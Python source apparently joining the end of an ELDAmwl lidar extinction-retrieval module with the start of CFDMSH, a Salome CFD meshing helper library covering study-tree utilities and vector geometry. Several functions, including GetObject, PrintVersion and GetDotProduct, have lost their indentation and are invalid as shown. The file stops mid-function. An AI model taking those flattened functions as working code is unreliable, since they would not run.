        self.yerr_data = np.array(data.ds.err)
        self.qf_data = np.array(data.ds.qf)
    def calc_single_profile(self, t, data):
        """Calculate the slope profile of time slice *t*, bin by bin."""
        fvb = data.first_valid_bin(t)
        lvb = data.last_valid_bin(t)
        for lev in range(fvb, lvb):
            window = int(data.ds.binres[t, lev])
            half_win = window // 2
            if lev < (fvb + half_win):
                # window would reach below the first valid bin
                self.result.set_invalid_point(t, lev, BELOW_OVL)
            elif lev >= (lvb - half_win):
                # window would reach above the last valid bin
                self.result.set_invalid_point(t, lev, ABOVE_MAX_ALT)
            else:
                self.calc_slope(t, lev, window, half_win)
    def run(self, data=None):
        """
        run the extinction calculation

        The optional keyword arg 'data' allows to feed new raman signals into
        an existing instance of CalcExtinctionDefault and run a new calculation.
        This feature is used e.g., for Monte-Carlo error retrievals

        Keyword Args:
            data (:class:`ELDAmwl.signals.Signals`): Raman signal, default=None

        Returns:
            profiles of particle extinction coefficients(:class:`ELDAmwl.extinction.product.Extinctions`)
        """
        if data is None:
            data = self.signal
        self.prepare_data(data)
        for t in range(data.num_times):
            self.calc_single_profile(t, data)
        # extract relevant parameter for calculation of ext from signal slope
        # from ExtinctionParams into Dict
        param_dct = Dict({
            'detection_wavelength': data.detection_wavelength,
            'emission_wavelength': data.emission_wavelength,
            'angstroem_exponent': self.ext_params.ang_exp_asDataArray,
        })
        # SlopeToExtinction converts the slope into extinction coefficients
        self.slope_to_ext_routine(
            slope=self.result.ds,
            ext_params=param_dct).run()
        return self.result
class ExtinctionFactory(BaseOperationFactory):
    """
    optional argument resolution, can be LOWRES(=0) or HIGHRES(=1)
    """
    name = 'ExtinctionFactory'
    def __call__(self, **kwargs):
        # All retrieval inputs are mandatory keyword arguments.
        for required in ('data_storage', 'ext_param', 'autosmooth'):
            assert required in kwargs
        return super(ExtinctionFactory, self).__call__(**kwargs)
    def get_classname_from_db(self):
        """
        return: always 'ExtinctionFactoryDefault' .
        """
        return ExtinctionFactoryDefault.__name__
class ExtinctionFactoryDefault(BaseOperation):
    """
    derives particle extinction coefficient.
    """
    name = 'ExtinctionFactoryDefault'
    param = None        # ExtinctionParams of the product
    raman_sig = None    # prepared Raman signal (deepcopy from data storage)
    smooth_res = None   # binres profile used for smoothing
    empty_ext = None    # Extinctions instance with metadata but empty profiles
    prod_id = NC_FILL_STR
    resolution = NC_FILL_INT
    def get_smooth_res(self):
        """Determine the smoothing resolution (binres) for the retrieval.

        Either derives it automatically from the signal (autosmooth) or reuses
        the common smooth binres stored for this product and resolution.
        """
        if self.kwargs['autosmooth']:
            result = ExtinctionAutosmooth()(
                signal=self.raman_sig.ds,
                smooth_params=self.param.smooth_params,
            ).run()
        else:
            result = self.data_storage.binres_common_smooth(self.prod_id, self.resolution)
        self.smooth_res = result
    def prepare(self):
        """Collect parameters, the prepared signal and the smoothing resolution."""
        self.param = self.kwargs['ext_param']
        self.prod_id = self.param.prod_id_str
        # NOTE(review): 'resolution' is read here but not asserted in
        # ExtinctionFactory.__call__ -- confirm callers always provide it.
        self.resolution = self.kwargs['resolution']
        # raman_sig is a deepcopy from data_storage
        self.raman_sig = self.data_storage.prepared_signal(
            self.param.prod_id_str,
            self.param.raman_sig_id)
        self.get_smooth_res()
        self.raman_sig.ds['binres'] = self.smooth_res
        self.empty_ext = Extinctions.init(self.raman_sig, self.param)
    def get_non_merge_product(self):
        """Run the extinction retrieval for a product without signal merging."""
        calc_routine = CalcExtinction()(
            ext_params=self.param,
            slope_routine=SignalSlope()(prod_id=self.prod_id),
            slope_to_ext_routine=SlopeToExtinction(),
            raman_signal=self.raman_sig,
            empty_ext=self.empty_ext,
        )
        ext = calc_routine.run()
        if self.param.error_method == MC:
            # Monte-Carlo error retrieval: rerun the calculation via the adapter
            # and overwrite the error profile. (The former "else: ext = ext"
            # no-op branch was removed.)
            adapter = zope.component.getAdapter(calc_routine, IMonteCarlo)
            ext.err[:] = adapter(self.param.mc_params)
        del self.raman_sig
        return ext
    def get_product(self):
        """Return the extinction product (currently only non-merged retrievals)."""
        self.prepare()
        if not self.param.includes_product_merging():
            ext = self.get_non_merge_product()
        else:
            # todo: result = Extinctions.from_merged_signals()
            ext = None
        return ext
# Register the default implementations so the factories above can resolve
# them by class name at runtime.
registry.register_class(ExtinctionFactory,
                        ExtinctionFactoryDefault.__name__,
                        ExtinctionFactoryDefault)
registry.register_class(CalcExtinction,
                        CalcExtinctionDefault.__name__,
                        CalcExtinctionDefault)
|
<reponame>tizon9804/SS2017<gh_stars>0
"""
++++++++++
+ CFDMSH +
++++++++++
Python Library for CFD Meshing with Salome Platform
Author: <NAME>. (www.tougeron-cfd.com)
Licence: GNU General Public License
"""
version = "4.0"
import salome, salome.geom.geomtools
import GEOM
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
import SMESH, SALOMEDS
from salome.smesh import smeshBuilder
smesh = smeshBuilder.New(salome.myStudy)
from salome.StdMeshers import StdMeshersBuilder
#import numpy
import time
import random
import ast
import csv
import os
import math
#### Here are internal functions ####
def ListComponentShapes( comp = "GEOM", output = "name", rec = True ):
    """
    Description:
        Gives the list of all objects published in a Salome component, being GEOM or SMESH.
    Arguments:
        # comp
            The name of the component : "GEOM" or "SMESH". Recurses over lists.
            Default value: "GEOM"
        # output
            Defines if the returned values should be the "name" or the "id" of the found shapes.
            Default value: "name"
        # rec
            If equals False, the function will only iterate over the first level of the study tree.
            Default value: True
    Returned Values:
        Type: String
        Number: n
    """
    # Make this function recursive
    if isinstance(comp, list):
        return_list = []
        for sub_object in comp:
            return_list.append(ListComponentShapes(sub_object, output, rec))
        return return_list
    #-
    if comp not in ["GEOM", "SMESH"]:
        return []
    component = salome.myStudy.FindComponent(comp)
    sub_shape_list = []
    try:
        child_iterator = salome.myStudy.NewChildIterator(component)
        child_iterator.InitEx(rec)
        while(child_iterator.More()):
            sub_object = child_iterator.Value()
            if sub_object.GetAllAttributes():
                if output == "name":
                    sub_shape = sub_object.GetName()
                elif output in ["id", "ID"]:
                    sub_shape = salome.ObjectToID(sub_object.GetObject())
                else:
                    sub_shape = None
                sub_shape_list.append(sub_shape)
            child_iterator.Next()
    except Exception:
        # A bare "except:" would also swallow KeyboardInterrupt/SystemExit;
        # restrict the silent best-effort fallback to ordinary errors.
        pass
    return sub_shape_list
lcs = ListComponentShapes
def CheckObjectExistence( name, comp = "GEOM" ):
    """
    Description:
        Checks if an object is already published in the study tree, according to its name and component.
    Arguments:
        # name
            The name of the shape (or a list of names; the function recurses).
        # comp
            The name of the component : "GEOM" or "SMESH".
            Default value: "GEOM"
    Returned Values:
        Type: Boolean (or None when name is None)
        Number: 1
    """
    # Make this function recursive
    if isinstance(name, list):
        return [CheckObjectExistence(sub_object, comp) for sub_object in name]
    #-
    # "is None" identity test instead of "== None"; a None name stays None
    if name is None:
        return None
    # Get the existing names and check the object existence directly
    name_list = ListComponentShapes(comp)
    return name in name_list
coe = CheckObjectExistence
def GetNextNameIndex( name, comp = "GEOM" ):
    """
    Description:
        Gives the next name index of a given name to be published in the study tree.
    Arguments:
        # name
            The name of the shape.
        # comp
            The name of the component : "GEOM" or "SMESH".
            Default value: "GEOM"
    Returned Values:
        Type: Integer (returned as a String)
        Number: 1
    """
    # Names already published in the component
    published_names = ListComponentShapes(comp)
    prefix = name + "_"
    # Collect the integer suffixes already used with this prefix
    used_indexes = set()
    for published_name in published_names:
        if prefix in published_name:
            name_ending = published_name.split(prefix)[1]
            try:
                used_indexes.add(int(name_ending))
            except ValueError:
                pass
    # Walk up from 1 until a free index is found
    candidate = 1
    while candidate in used_indexes:
        candidate += 1
    return str(candidate)
gnni = GetNextNameIndex
def AddToStudy( object, name = "Geometrical Object", father = None, suffix = True, disp = True, refresh = True ):
    """
    Description:
        Flexibly publishes an object in the study tree.
    Arguments:
        # object
            The object to publish (or a list of objects; the function recurses).
        # name
            The name to give to the shape in the study tree.
            Default value: "Geometrical Object"
        # father
            The geometrical shape in which to add the published shape.
            Default value: None
        # suffix
            Determines if a suffix (eg. "_1") has to be added to the name of the shape to publish.
            Default value: True
        # disp
            Determines if the shape has to be displayed in the 3D window after publication.
            Default value: True
        # refresh
            Determines if the study tree has to be refreshed after publication.
            Default value: True
    Returned Values:
        -
    """
    if isinstance(object, list):
        for sub_object in object:
            AddToStudy(sub_object, name, father, suffix, disp, refresh)
    else:
        if not isinstance(name, str):
            name = str(name)
        if suffix == True:
            # Append the next free index, e.g. "Wire" -> "Wire_3"
            index = GetNextNameIndex(name)
            name += "_"
            name += index
        # "entry_id" instead of "id": avoid shadowing the builtin id()
        if father == None:
            entry_id = geompy.addToStudy(object, name)
        else:
            entry_id = geompy.addToStudyInFather(father, object, name)
        if refresh == True:
            if disp == True:
                gg = salome.ImportComponentGUI("GEOM")
                gg.createAndDisplayGO(entry_id)
            else:
                if salome.sg.hasDesktop():
                    salome.sg.updateObjBrowser(1)
ats = AddToStudy
def GetObject( object = None, comp = "GEOM", silent = False ):
"""
Description:
Gets a published object, according to its name in the study tree and its component.
Arguments:
# object
Description: The name of the object to get.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# comp
Description: The name of the component : "GEOM" or "SMESH".
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "GEOM"
# silent
Description: Determines if the error message, in case no object was found, has to be hidden or not.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Any object
Number: 1
Name: -
Conditions of use:
-
"""
# Make this function recursive
if isinstance(object, list):
return_list = []
for sub_object in object:
return_list.append(GetObject(sub_object, comp, silent))
return return_list
#-
if isinstance(object, str):
if CheckObjectExistence(object, comp):
object = salome.myStudy.FindObjectByName(object, comp)[0].GetObject()
else:
if silent == False:
print "[X] The object", object, "doesn't exist in the study tree."
return "error"
return object
go = GetObject
def GetSubShapes( shape ):
    """
    Description:
        Gets all sub-vertexes, sub-edges, sub-faces and sub-solids of a geometrical shape.
    Arguments:
        # shape
            The shape from which to get sub shapes (or a list of shapes; the function recurses).
    Returned Values:
        [vertexes, edges, faces, solids, shape] -- the first four items are lists.
    """
    # Recurse over lists of shapes
    if isinstance(shape, list):
        return [GetSubShapes(sub_shape) for sub_shape in shape]
    # Explode the shape once per sub-shape kind, lowest dimension first
    exploded = [geompy.SubShapeAll(shape, geompy.ShapeType[shape_type])
                for shape_type in ("VERTEX", "EDGE", "FACE", "SOLID")]
    return exploded + [shape]
gss = GetSubShapes
def GetGUISelection( shape = None, uniq = False ):
    """
    Description:
        Gets the objects selected in the GUI.
    Arguments:
        # shape
            The input shape. If different that None, this shape is returned instead of the GUI selection.
            Default value: None
        # uniq
            Allows to restrict the number of returned objects to one.
            Default value: False
    Returned Values:
        Type: Any object
        Number: n
    """
    # Only query the GUI when no shape was passed in explicitly
    if shape == None or shape == [None]:
        selected_object_ids = salome.sg.getAllSelected()
        if len(selected_object_ids) > 0:
            selected_objects = []
            for selected_object_id in selected_object_ids:
                selected_objects.append(salome.myStudy.FindObjectID(selected_object_id).GetObject())
            # A single selection (or uniq == True) yields one object, not a list
            if (shape == None and len(selected_objects) == 1) or (uniq == True):
                shape = selected_objects[0]
                if len(selected_objects) > 1 and uniq == True:
                    print "[i] Only one object processed over " + str(len(selected_object_ids)) + "."
            else:
                shape = selected_objects
    return shape
ggs = GetGUISelection
def PrintDefinedFunctions( cond = False ):
    """
    Description:
        Displays the list of all available cfdmsh functions.
    Arguments:
        # cond
            Allows to display the function names in condensed mode.
            Default value: False
    Returned Values:
        -
    """
    # The two listings below are printed verbatim; keep them in sync with the
    # functions actually defined in this module.
    if cond == True:
        print """ListComponentShapes
CheckObjectExistence
GetNextNameIndex
AddToStudy
GetObject
GetSubShapes
GetGUISelection
PrintDefinedFunctions
PrintVersion
GetBoundaryVertexes
GetReorderedEdges
GetNormalizedVector
GetCrossProduct
GetDotProduct
GetTurnAngle
GeometricalEquality
GetBoundaryFaces
GetTriEdgeFaces
RebuildSpline
SplitEdge
DiscretizeEdgeByCurvature
FuseSplines
ExtendSpline
ExtendSplinesToIntersection
FuseSplineSets
UnrefineSplineSet
SwitchSplineSet
RebuildFace
FuseCoplanarFaces
FuseShellFaces
FuseGroupFaces
RemoveFaceExtraEdges
MakeFoilTrailingFillets
MakeMiddleSpline
MakeCurveFromUnsortedVertexes
MakeEllipticalFilling
MakeFillingFromUnsortedEdges
MakeFoilFromUnsortedVertexes
MakeEdgeOffset
MakePlanarWireOffset
CloseViscousLayer
ExtendViscousLayer
PropagateViscousLayerIntersection
MakeTipViscousLayer
CloseTipViscousLayer
ExtendTipViscousLayer
MakeLinkingSolids
CopyGeometricalGroups
ExportGeometricalGroups
ImportGeometricalGroups
PutAllSubShapesInAGroup
SetRandomColors
ExportCSVFile
ImportCSVFile
MakeVirtualOffsetEdgeSubmeshes
MakeTriEdgeFaceSubmeshes
ProjectEdgeSubmesh
MakeNetgenRefinement
SetNetgenRefinement
ClearNetgenRefinement
ProjectMeshGroupOnFace
MakeVertexesFromMeshGroup
RotateFlapGenerateAndExportMeshInAmshFormat
ViscousLayerScaleFactor
ExportMeshConfiguration
ImportMeshConfiguration
ExportHypotheses
ImportHypotheses
ExportAmshFile
ExportSU2File"""
    else:
        print """
Defined Functions:
Internal Functions
==================
List Component Shapes
Check Object Existence
Get Next Name Index
Add To Study
Get Object
Get Sub Shapes
Get GUI Selection
Print Defined Functions
Print Version
Geometry Module
===============
Measurement
...........
Edges
Get Boundary Vertexes
Get Reordered Edges
Vectors
Get Normalized Vector
Get Cross Product
Get Dot Product
Get Turn Angle
Any Shape
Geometrical Equality
Get Boundary Faces
Get Tri Edge Faces
Repair
......
Splines or Edges
Rebuild Spline
Split Edge
Discretize Edge By Curvature
Fuse Splines
Extend Spline
Extend Splines To Intersection
Spline Sets
Fuse Spline Sets
Unrefine Spline Set
Switch Spline Set
Faces
Rebuild Face
Fuse Coplanar Faces
Fuse Shell Faces
Fuse Group Faces
Remove Face Extra Edges
Foils
Make Foil Trailing Fillets
Basic Geometry Generation
.........................
Splines
Make Middle Spline
Make Curve From Unsorted Vertexes
Faces
Make Elliptical Filling
Make Filling From Unsorted Edges
Foils
Make Foil From Unsorted Vertexes
Viscous Layer Generation
........................
2D
Make Edge Offset
Make Planar Wire Offset
Extend Viscous Layer
Close Viscous Layer
Propagate Viscous Layer Intersection
3D
Make Tip Viscous Layer
Extend Tip Viscous Layer
Close Tip Viscous Layer
Make Linking Solids
Group Management
................
Copy Geometrical Groups
Export Geometrical Groups
Import Geometrical Groups
Put All Sub Shapes In A Group
Rendering
.........
Set Random Colors
Import / Export
...............
Export CSV File
Import CSV File
Geometry + Mesh modules
=======================
Viscous Layer Meshing
.....................
Make Virtual Offset Edge Submesh
Make Tri Edge Face Submeshes
Project Edge Submesh
Netgen Refinement
.................
Make Netgen Refinement
Set Netgen Refinement
Clear Netgen Refinement
Mesh Repair
...........
Project Mesh Group On Face
Mesh to Geometry Conversion
...........................
Make Vertexes From Mesh Group
Parametric Meshing
..................
Rotate Flap Generate And Export Mesh In Amsh Format
Mesh Module
===========
Viscous Layer Meshing
.....................
Viscous Layer Scale Factor
Mesh Management
...............
Export Mesh Configuration
Import Mesh Configuration
Hypothesis Management
.....................
Export Hypotheses
Import Hypotheses
Mesh Export
...........
Export Amsh File
Export SU2 File
"""
pdf = PrintDefinedFunctions
def PrintVersion( ):
"""
Description:
Displays the cfdmsh version.
Arguments:
# -
Description: -
Type: -
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
print "Version:"
print version
pv = PrintVersion
#### - ####
#### Here are beta cfdmsh functions ####
#### - ####
def GetBoundaryVertexes( wire = None, tol = 1e-7, single = True, add = True, infa = True ):
	"""
	Description:
		Gets boundary vertexes from a wire and put them into a group.
	Arguments:
		# wire
			Description: The input wire.
			Type: Wire
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# tol
			Description: See here.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1e-7
		# single
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# infa
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
	Returned Values:
		"dim" value: -
		"single" value: False
			Type: Vertex
			Number: 2
			Name: "BoundaryVertex"
		"dim" value: -
		"single" value: True
			Type: Compound or Group of Vertexes
			Number: 1
			Name: "BoundaryVertexes"
	Conditions of use:
		-
	"""
	input_shape = wire
	# Get the input shape(s)
	input_shape = GetGUISelection(input_shape)
	input_shape = GetObject(input_shape)
	#-
	# Make this function recursive
	if isinstance(input_shape, list):
		return_list = []
		for sub_object in input_shape:
			return_list.append(GetBoundaryVertexes(sub_object, tol, single, add, infa))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [input_shape] or None in [input_shape]: return
	#-
	# Set father object
	father = None
	if infa == True: father = input_shape
	#-
	wire = input_shape
	if False: pass
	else:# All checks done
		# Get the sub-shapes
		wire_edge_list = geompy.SubShapeAll(wire, geompy.ShapeType["EDGE"])
		wire_vertex_list = geompy.SubShapeAll(wire, geompy.ShapeType["VERTEX"])
		#-
		# Get the boundary vertexes: a vertex touching exactly one edge
		# (within tol) lies on the wire boundary
		boundary_vertex_list = []
		for vertex in wire_vertex_list:
			nb_touching_edges = 0
			for edge in wire_edge_list:
				distance = geompy.MinDistance(edge, vertex)
				if distance < tol:
					nb_touching_edges += 1
			if nb_touching_edges == 1:
				boundary_vertex_list.append(vertex)
		#-
		# Detect closed wire (a closed wire has no boundary vertexes)
		if len(boundary_vertex_list) < 2:
			boundary_vertex_list = []
		#-
		if len(boundary_vertex_list) == 0:
			return
		to_return = boundary_vertex_list
		# Bug fix: the singular / plural names were swapped with respect to
		# the documented contract (and to the GetBoundaryFaces convention):
		# the list of separate vertexes is named "BoundaryVertex", the single
		# group / compound is named "BoundaryVertexes"
		to_return_name = "BoundaryVertex"
		if single == True:
			to_return_name = "BoundaryVertexes"
			if infa == True:
				# Create the boundary vertex group
				boundary_vertex_group = geompy.CreateGroup(father, geompy.ShapeType["VERTEX"])
				#-
				for boundary_vertex in boundary_vertex_list:# For each boundary vertex...
					# Get the boundary vertex ID
					boundary_vertex_id = geompy.GetSubShapeID(father, boundary_vertex)
					#-
					# Put the boundary vertex in the group
					geompy.AddObject(boundary_vertex_group, boundary_vertex_id)
					#-
				to_return = boundary_vertex_group
			else:
				compound = geompy.MakeCompound(boundary_vertex_list)
				to_return = compound
		# Add and return the resulting shape(s)
		if add == True:
			AddToStudy(to_return, to_return_name, father)
		return to_return
		#-
gbv = GetBoundaryVertexes
def GetReorderedEdges( wire = None, tol = 1e-9, add = True, infa = False ):
	"""
	Description:
		Gets reordered edges from a wire, starting from one of its boundaries if open.
	Arguments:
		# wire
			Description: The input wire.
			Type: Wire
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# tol
			Description: See here.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1e-9
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# infa
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
	Returned Values:
		"dim" value: -
		"single" value: -
			Type: Edge
			Number: n
			Name: "ReorderedEdge"
	Conditions of use:
		-
	"""
	input_shape = wire
	# Get the input shape(s)
	input_shape = GetGUISelection(input_shape)
	input_shape = GetObject(input_shape)
	#-
	# Make this function recursive
	if isinstance(input_shape, list):
		return_list = []
		for sub_object in input_shape:
			return_list.append(GetReorderedEdges(sub_object, tol, add, infa))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [input_shape] or None in [input_shape]: return
	#-
	# Set father object
	father = None
	if infa == True: father = input_shape
	#-
	wire = input_shape
	if False: pass
	else:# All checks done
		resting_edges = geompy.SubShapeAll(wire, geompy.ShapeType["EDGE"])
		nb_edges = len(resting_edges)
		# Get boundary vertexes (returns None for a closed wire)
		boundary_vertexes = GetBoundaryVertexes(wire, add = False, single = False)
		#-
		# Check if the wire is closed
		wire_is_closed = False
		if boundary_vertexes == None:
			wire_is_closed = True
		#-
		# Detect the first edge: for an open wire, the edge touching the
		# first boundary vertex; otherwise fall back to an arbitrary edge
		found = False
		if wire_is_closed == False:
			boundary_vertex = boundary_vertexes[0]
			for i in range(nb_edges):
				the_edge = resting_edges[i]
				distance = geompy.MinDistance(the_edge, boundary_vertex)
				if distance <= tol:
					first_edge = resting_edges.pop(i)
					found = True
					break
		if found == False:
			first_edge = resting_edges.pop()
		#-
		first_edge_vertexes = geompy.SubShapeAll(first_edge, geompy.ShapeType["VERTEX"])
		first_edge_vertex_compound = geompy.MakeCompound(first_edge_vertexes)
		# Sort the resting edges: repeatedly pick the edge touching the
		# current edge's vertexes, reorienting it when its start vertex
		# does not coincide with the current edge's end vertex
		sorted_edges = [first_edge]
		n = 0
		while len(resting_edges) > 0:
			i = 0
			for edge in resting_edges:
				edge_vertexes = geompy.SubShapeAll(edge, geompy.ShapeType["VERTEX"])
				edge_vertex_compound = geompy.MakeCompound(edge_vertexes)
				distance = geompy.MinDistance(first_edge_vertex_compound, edge_vertex_compound)
				if distance <= tol:
					# Compare the candidate's start (parameter 0.0) with the
					# current edge's end (parameter 1.0) to decide orientation
					first_vertex = geompy.MakeVertexOnCurve(edge, 0.0)
					last_vertex = geompy.MakeVertexOnCurve(first_edge, 1.0)
					distance = geompy.MinDistance(first_vertex, last_vertex)
					first_edge = resting_edges.pop(i)
					if distance > tol:
						first_edge = geompy.ChangeOrientation(first_edge)
					first_edge_vertexes = geompy.SubShapeAll(first_edge, geompy.ShapeType["VERTEX"])
					first_edge_vertex_compound = geompy.MakeCompound(first_edge_vertexes)
					sorted_edges.append(first_edge)
					break
				i += 1
			# Safety guard: abort if no adjacent edge is ever found
			if n >= 9999:
				print "[X] Infinite loop during edge reordering."
				break
			n += 1
		#-
		# Add and return the resulting shape(s)
		if add == True:
			AddToStudy(sorted_edges, "ReorderedEdge", father)
		return sorted_edges
		#-
gre = GetReorderedEdges
def GetNormalizedVector( vector = None, add = True, infa = False ):
	"""
	Description:
		Normalizes a 3D vector.
	Arguments:
		# vector
			Description: The input vector.
			Type: Vector
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# infa
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
	Returned Values:
		"dim" value: -
		"single" value: -
			Type: Vector
			Number: 1
			Name: "NormalizedVector"
	Conditions of use:
		-
	"""
	input_shape = vector
	# Get the input shape(s)
	input_shape = GetGUISelection(input_shape)
	input_shape = GetObject(input_shape)
	#-
	# Make this function recursive
	if isinstance(input_shape, list):
		return_list = []
		for sub_object in input_shape:
			return_list.append(GetNormalizedVector(sub_object, add, infa))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [input_shape] or None in [input_shape]: return
	#-
	# Set father object
	father = None
	if infa == True: father = input_shape
	#-
	vector = input_shape
	if False: pass
	else:# All checks done
		# Scale the vector about its own base point by 1 / magnitude
		# (NOTE: a zero-length vector would raise a ZeroDivisionError)
		base_vertex = geompy.MakeVertexOnCurve(vector, 0)
		magnitude = geompy.BasicProperties(vector)[0]
		normalized_vector = geompy.MakeScaleTransform(vector, base_vertex, 1.0 / magnitude)
		# Add and return the resulting shape(s)
		# Bug fix: "father" was computed from "infa" but never passed to
		# AddToStudy, so the "infa" argument had no effect
		if add == True:
			AddToStudy(normalized_vector, "NormalizedVector", father)
		return normalized_vector
		#-
gnv = GetNormalizedVector
def GetCrossProduct( vector_1 = None, vector_2 = None, tol = 1e-7, add = True ):
	"""
	Description:
		Computes the cross product between two 3D vectors.
	Arguments:
		# vector_1
			Description: The first vector.
			Type: Vector
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: None
		# vector_2
			Description: The second vector.
			Type: Vector
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: None
		# tol
			Description: See here.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1e-7
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
	Returned Values:
		"dim" value: -
		"single" value: -
			Type: Vector
			Number: 1
			Name: "CrossProduct"
	Conditions of use:
		-
	"""
	# Consistency fix: the docstring already declared "Default value: None"
	# for both vectors; the signature now matches it (backward-compatible)
	input_shapes = [vector_1, vector_2]
	# Get the input shape(s)
	input_shapes = GetObject(input_shapes)
	#-
	# Check the input shape existence
	if "error" in input_shapes or None in input_shapes: return
	#-
	[vector_1, vector_2] = input_shapes
	if False: pass
	else:# All checks done
		base_vertex = geompy.MakeVertexOnCurve(vector_1, 0)
		origin = geompy.MakeVertex(0, 0, 0)
		c1 = geompy.VectorCoordinates(vector_1)
		c2 = geompy.VectorCoordinates(vector_2)
		# Classical cross product components
		x = c1[1] * c2[2] - c1[2] * c2[1]
		y = c1[2] * c2[0] - c1[0] * c2[2]
		z = c1[0] * c2[1] - c1[1] * c2[0]
		vector_product_norm = math.sqrt(pow(x,2) + pow(y,2) + pow(z,2))
		# A near-zero norm means the input vectors are (anti)parallel:
		# return None in that case instead of a degenerate vector
		if vector_product_norm > tol:
			vector_product = geompy.MakeVectorDXDYDZ(x, y, z)
			# Move the result so it starts at the first vector's base point
			vector_product = geompy.MakeTranslationTwoPoints(vector_product, origin, base_vertex)
		else:
			vector_product = None
		# Add and return the resulting shape(s)
		if add == True and vector_product != None:
			AddToStudy(vector_product, "CrossProduct")
		return vector_product
		#-
gcp = GetCrossProduct
def GetDotProduct( vectors = [None] ):
"""
Description:
Computes the dot product between two 3D vectors.
Arguments:
# vectors
Description: The input vectors.
Type: List of 2 Vectors
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: Float
Number: 1
Name: -
Conditions of use:
-
"""
if isinstance(vectors, list) == False: print "[X] The first argument (vectors) should be an array."; return
input_shapes = vectors
# Get the input shape(s)
input_shapes = GetGUISelection(input_shapes)
input_shapes = GetObject(input_shapes)
#-
# Check the input shape existence
if "error" in input_shapes or None in input_shapes: return
#-
# Check the number of selected objects
if len(input_shapes) != 2:
print "[X] Two shapes should be selected."
return
#-
vectors = input_shapes
if False: pass
else:# All checks done
c1 = geompy.VectorCoordinates(vectors[0])
c2 = geompy.VectorCoordinates(vectors[1])
dot_product = c1[0] * c2[0] + c1[1] * c2[1] + c1[2] * c2[2]
return dot_product
gdp = GetDotProduct
def GetTurnAngle( vector_1, vector_2, normal, unit = "rad" ):
	"""
	Description:
		Gets the "turn angle" between two vectors.
	Arguments:
		# vector_1
			Description: The first vector.
			Type: Vector
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: None
		# vector_2
			Description: The second vector.
			Type: Vector
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: None
		# normal
			Description: The reference vector indicating the angle orientation, being normal to other input vectors.
			Type: Vector
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: None
		# unit
			Description: Defines the return unit. Can equal "rad" or "deg".
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "rad"
	Returned Values:
		"dim" value: -
		"single" value: -
			Type: Float
			Number: 1
			Name: -
	Conditions of use:
		-
	"""
	input_shapes = [vector_1, vector_2, normal]
	# Get the input shape(s)
	input_shapes = GetObject(input_shapes)
	#-
	# Check the input shape existence
	if "error" in input_shapes or None in input_shapes: return
	#-
	[vector_1, vector_2, normal] = input_shapes
	if False: pass
	else:# All checks done
		vector_1 = GetNormalizedVector(vector_1, add = False)
		vector_2 = GetNormalizedVector(vector_2, add = False)
		dot_product = GetDotProduct([vector_1, vector_2])
		vector_product = GetCrossProduct(vector_1, vector_2, add = False)
		if vector_product == None:# The vectors are (anti)parallel...
			# Distinguish the parallel / antiparallel cases by comparing
			# the normalized vectors' tips
			coord_1 = geompy.VectorCoordinates(vector_1)
			coord_2 = geompy.VectorCoordinates(vector_2)
			vertex_1 = geompy.MakeVertex(coord_1[0], coord_1[1], coord_1[2])
			vertex_2 = geompy.MakeVertex(coord_2[0], coord_2[1], coord_2[2])
			distance = geompy.MinDistance(vertex_1, vertex_2)
			tol = 0.1
			if distance < tol:
				angle = 0.0
			else:
				angle = math.pi
		else:
			# Robustness fix: floating-point drift can push the dot product
			# of two normalized vectors slightly outside [-1, 1], which
			# would make math.acos() raise a ValueError - clamp it first
			if dot_product > 1.0: dot_product = 1.0
			elif dot_product < -1.0: dot_product = -1.0
			angle = math.acos(dot_product)
			# Use the reference normal to orient the angle over [0, 2*pi)
			if GetDotProduct([vector_product, normal]) < 0:
				angle = 2 * math.pi - angle
		if unit != "rad":
			angle = angle / math.pi * 180.0
		return angle
gta = GetTurnAngle
def GeometricalEquality( shapes = [None], tol = 1e-7 ):
"""
Description:
Compares the shapes of two geometrical objects.
Arguments:
# shapes
Description: Geometrical objects to be compared.
Type: List of 2 Geometrical objects
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# tol
Description: Maximum difference allowed between all the shape parameters.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
Returned Values:
"dim" value: -
"single" value: -
Type: Boolean
Number: 1
Name: -
Conditions of use:
-
"""
if isinstance(shapes, list) == False: print "[X] The first argument (shapes) should be an array."; return
# Get the input shape(s)
